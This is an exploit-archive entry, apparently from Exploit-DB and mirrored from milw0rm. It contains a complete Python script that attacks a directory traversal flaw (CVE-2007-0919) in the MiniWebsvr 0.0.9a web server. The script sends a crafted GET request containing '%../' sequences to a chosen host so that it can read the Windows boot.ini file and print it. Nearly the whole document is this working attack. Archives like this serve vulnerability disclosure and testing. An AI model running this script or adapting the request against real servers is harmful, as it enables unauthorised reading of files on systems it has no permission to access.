[] NeoSense

MiniWebsvr 0.0.9a - Remote Directory Traversal

Author: gbr
type: remote
platform: windows
port: 
date_added: 2008-03-02 
date_updated: 2016-09-27 
verified: 1 
codes: OSVDB-50022;CVE-2007-0919 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comminiwebsvr_0.0.9_win32.zip

import socket
import sys

print '---------------------------------------------------------'
print 'MiniWebSvr 0.0.9a Directory Transversal Vulnerability'
print 'Project URL: http://miniwebsvr.sourceforge.net/'
print 'Author: gbr'
print 'Tested on Windows XP SP2'
print '---------------------------------------------------------'

host = "127.0.0.1"
port = 8080

if sys.argv[1:]:
        host = sys.argv[1]
        if sys.argv[2:]:
                port = int(sys.argv[2])

try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((host, port))
        s.send("GET /%../../../../../../../../../../../boot.ini HTTP/1.0\r\n\r\n")
        while True:
                data = s.recv(4096)
                if not data:
                        break
                print data

except:
        print "Connection Error"

# milw0rm.com [2008-03-03]